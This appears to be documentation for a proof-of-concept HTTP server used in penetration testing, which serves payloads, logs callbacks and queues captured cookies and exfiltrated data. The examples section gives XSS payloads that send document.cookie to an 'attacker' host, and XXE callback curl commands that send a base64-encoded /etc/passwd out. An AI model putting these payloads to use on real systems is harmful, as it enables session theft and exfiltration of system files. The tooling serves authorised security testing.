Servers
HTTP servers for serving payloads and logging callbacks.
POC HTTP Server
Simple HTTP server that serves payloads and logs all requests. Automatically captures cookies and exfiltrated data.
Simple HTTP server for POC development.
This module provides a lightweight HTTP server that:
- Serves files from the payloads/ directory
- Logs all incoming requests to logs/server.ndjson
- Automatically captures cookies and exfiltrated data
- Provides an event queue accessible via HTTP DELETE /queue
The server supports both query parameters and path parameters for cookie and exfil data capture:
- Query: /?cookie=data or /?exfil=data
- Path: /cookie/data or /exfil/data
- class your_project.servers.server.POCHTTPHandler(*args, **kwargs)
Bases: SimpleHTTPRequestHandler
HTTP request handler for POC development.
Extends SimpleHTTPRequestHandler to add:
- Automatic request logging
- Cookie capture from query params or path
- Exfil data capture from query params or path
- Event queue for interesting captures
- CORS support for XSS callbacks
- __init__(*args, **kwargs)
Initialize the handler.
Automatically sets the serving directory to payloads/.
- do_DELETE()
Handle DELETE requests for event queue.
DELETE /queue pops and returns the next event from the queue. Returns 200 with JSON event data if available, 204 if queue is empty.
- Returns:
{"type": "cookie", "data": "…", "timestamp": "…"}, or 204 No Content if the queue is empty
- Return type:
JSON with event data
- do_POST()
Handle POST requests.
Logs the request and body, then sends a JSON response confirming the data was received.
- handle_request()
Log request details and capture interesting data.
Logs all request details to logs/server.ndjson and checks for:
- Cookies in query (?cookie=) or path (/cookie/)
- Exfil data in query (?exfil=) or path (/exfil/)
Captured cookies and exfil data are:
- Displayed in console with colored output
- Added to the event queue (accessible via DELETE /queue)
- Logged to server.ndjson
Cookie data is automatically base64-decoded if possible. Path parameters are URL-decoded automatically.
- log_message(format, *args)
Log an arbitrary message.
This is used by all other logging functions. Override it if you have specific logging wishes.
The first argument, FORMAT, is a format string for the message to be logged. If the format string contains any % escapes requiring parameters, they should be specified as subsequent arguments (it’s just like printf!).
The client ip and current date/time are prefixed to every message.
Unicode control characters are replaced with escaped hex before writing the output to stderr.
- your_project.servers.server.main_with_args(args)
Main entry point called from CLI.
Starts the HTTP server on the specified host and port. Displays all available network interfaces and their IPs.
- Parameters:
args – Namespace with bind (str) and port (int) attributes
The server will:
- Serve files from payloads/ directory
- Log all requests to logs/server.ndjson
- Capture cookies and exfil data automatically
- Provide event queue at DELETE /queue
Usage
Start the server from your project directory:
# Using the CLI (recommended):
uv run your_project --server
# Or run directly:
uv run python -m your_project.servers.server
The server will:
- Serve files from payloads/ directory
- Log all requests to logs/server.ndjson
- Capture cookies from ?cookie= parameter or /cookie/ path
- Capture exfil data from ?exfil= parameter or /exfil/ path
- Provide event queue via DELETE /queue endpoint
Examples
Cookie Capture:
Query parameter:
// XSS payload
fetch('http://attacker:8000/?cookie=' + btoa(document.cookie))
Path parameter:
// XSS payload
fetch('http://attacker:8000/cookie/' + encodeURIComponent(document.cookie))
Exfil Data:
Query parameter:
# XXE payload callback
curl "http://attacker:8000/?exfil=$(cat /etc/passwd | base64)"
Path parameter:
# XXE payload callback
curl "http://attacker:8000/exfil/$(cat /etc/passwd | base64)"
Getting Events:
import requests

# Pop next event from queue
response = requests.delete('http://localhost:8000/queue')
if response.status_code == 200:
    event = response.json()
    print(f"Type: {event['type']}, Data: {event['data']}")
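The capture rules described for handle_request() (query or path form, URL-decoding of path data, base64-decoding of cookie data when possible) can be written as a pure function, which is convenient for unit-testing those rules or for classifying request lines during log triage. This is an added example, not the project's own code: classify_capture, decode_cookie, the omission of the timestamp field and the sample request targets are assumptions made here.

```python
import base64
import binascii
from urllib.parse import parse_qs, unquote, urlsplit

KINDS = ("cookie", "exfil")  # the two capture types the docs name


def decode_cookie(value):
    """Return base64-decoded UTF-8 text if value decodes cleanly, else value as-is."""
    # parse_qs turns a literal "+" (legal in btoa output) into a space; undo that.
    candidate = value.replace(" ", "+")
    candidate += "=" * (-len(candidate) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(candidate, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return value  # not base64, e.g. a raw "k=v; k2=v2" cookie string


def classify_capture(target):
    """Hypothetical helper: map a request target to {"type", "data"}, or None."""
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    for kind in KINDS:
        prefix = f"/{kind}/"
        if kind in query:  # query form: /?cookie=data or /?exfil=data
            data = query[kind][0]
            break
        if parts.path.startswith(prefix):  # path form: /cookie/data or /exfil/data
            data = unquote(parts.path[len(prefix):])  # path data is URL-decoded
            break
    else:
        return None  # ordinary request, nothing to capture
    if kind == "cookie":  # the docs state base64 decoding only for cookie data
        data = decode_cookie(data)
    return {"type": kind, "data": data}


# Constructed sample request targets (not captured traffic).
SAMPLES = [
    "/?cookie=c2lkPWFiYw==",                 # base64 of "sid=abc"
    "/cookie/sid%3Dabc%3B%20theme%3Ddark",   # URL-encoded raw cookie string
    "/exfil/cm9vdA%3D%3D",                   # exfil data is left as received
    "/index.html?x=1",                       # no capture
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(target, "->", classify_capture(target))
```

Because decoding is attempted on every cookie value, a short plain value that happens to be valid base64 of UTF-8 text will also be decoded; keeping the raw request in the log preserves the original.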